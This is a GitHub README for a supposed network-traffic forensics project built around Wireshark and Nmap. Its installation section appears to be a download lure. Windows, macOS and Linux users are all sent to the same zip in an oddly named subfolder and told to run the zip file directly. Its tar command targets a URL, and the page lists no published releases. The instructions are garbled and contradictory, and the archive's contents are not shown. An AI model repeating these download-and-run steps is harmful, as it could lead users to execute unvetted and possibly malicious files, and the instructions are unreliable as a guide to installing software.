Skip to content

๐Ÿงฉ Analyze network traffic and uncover cyber threats using Wireshark and Nmap in this comprehensive forensics project.

Notifications You must be signed in to change notification settings

kamley/cybersec_project_2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

7 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐Ÿ” cybersec_project_2 - Analyze Network Traffic Easily

๐ŸŽ‰ Overview

Welcome to the cybersec_project_2! This application helps you analyze network traffic effectively and simulates a Security Operations Center (SOC) environment. Using powerful tools like Wireshark and Nmap, you can detect network reconnaissance attempts, analyze unencrypted HTTP traffic, and observe DNS behavior. This project provides practical incident reporting and helps you identify Indicators of Attack (IOAs).

๐Ÿ“ฅ Download

Download Latest Release

To get the application, please visit the Releases page:

Download & Install

๐Ÿš€ Getting Started

Follow these simple steps to set up cybersec_project_2 on your computer:

  1. Visit the Releases Page: Go to the Releases page to find the latest version of the software.

  2. Choose the Right File: Locate the file that corresponds to your operating system:

    • For Windows, download https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
    • For macOS, download https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
    • For Linux, download https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
  3. Download the File: Click on the file to download it to your computer.

  4. Extract the Files: Once downloaded, extract the files:

    • On Windows, right-click on the .zip file and select "Extract All."
    • On macOS, double-click the .zip file.
    • On Linux, use the terminal command tar -xvzf https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip.
  5. Run the Application: Open the extracted folder and run the application:

    • On Windows, double-click the https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip file.
    • On macOS, open the https://raw.githubusercontent.com/kamley/cybersec_project_2/main/Biddelian/cybersec_project_2.zip file.
    • On Linux, use the terminal to navigate to the folder and run ./cybersec_project_2.
  6. Follow the On-Screen Instructions: The application will guide you through the setup process. Make sure to follow the prompts provided.

๐Ÿ“Š Features

  • Network Traffic Analysis: Inspect packets captured from network activity.
  • Reconnaissance Detection: Identify attempts to probe your network.
  • HTTP and DNS Analysis: Examine unencrypted traffic and behavior of DNS queries.
  • Incident Reporting: Record and report security incidents based on your findings.
  • Indicators of Attack (IOAs): Detect patterns indicative of a breach.

๐Ÿ› ๏ธ System Requirements

Before you install cybersec_project_2, please ensure your system meets the following requirements:

  • Operating System:

    • Windows 10 or later
    • macOS Sierra or later
    • Any recent distribution of Linux (kernel 4.4 or later)
  • Hardware:

    • Minimum 4GB of RAM
    • At least 500MB of free disk space
    • Network interface card for packet capture

๐ŸŒ How to Use

After installing the application, follow these steps for effective usage:

  1. Launch the Application: Start the application as described in the "Run the Application" section.

  2. Select Your Network Interface: Choose the network interface you want to monitor from the dropdown menu.

  3. Start Capturing Traffic: Click on the โ€œStart Captureโ€ button. The application will begin capturing network packets.

  4. Analyze Captured Data: View the real-time data. You can filter and search for specific packets or protocols.

  5. Generate Reports: Use the incident reporting feature to document any suspicious activities.

  6. Explore Analysis Features: Utilize different tabs for HTTP and DNS analysis. Each will provide insights into your network's behavior.

๐Ÿ“„ FAQs

Q: Is it safe to analyze network traffic?

A: Yes, as long as you have permission to monitor the network. Always respect privacy.

Q: Can I use this tool at work?

A: Ensure that your workplace policies allow for network analysis before using it.

Q: How do I report an issue?

A: You can report issues using the "Issues" section on our GitHub page. Provide detailed information about the problem you're facing.

โœ‰๏ธ Support

For assistance, please visit the project's GitHub page and check the Issues tab. We welcome contributions and feedback from all users.

๐Ÿ“… Upcoming Features

We are constantly updating cybersec_project_2. Keep an eye out for future releases that may include:

  • Enhanced reporting features
  • Additional traffic analysis tools
  • Improved user interface

Thank you for using cybersec_project_2! Enjoy analyzing your network traffic and enhancing your cybersecurity knowledge.

About

๐Ÿงฉ Analyze network traffic and uncover cyber threats using Wireshark and Nmap in this comprehensive forensics project.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •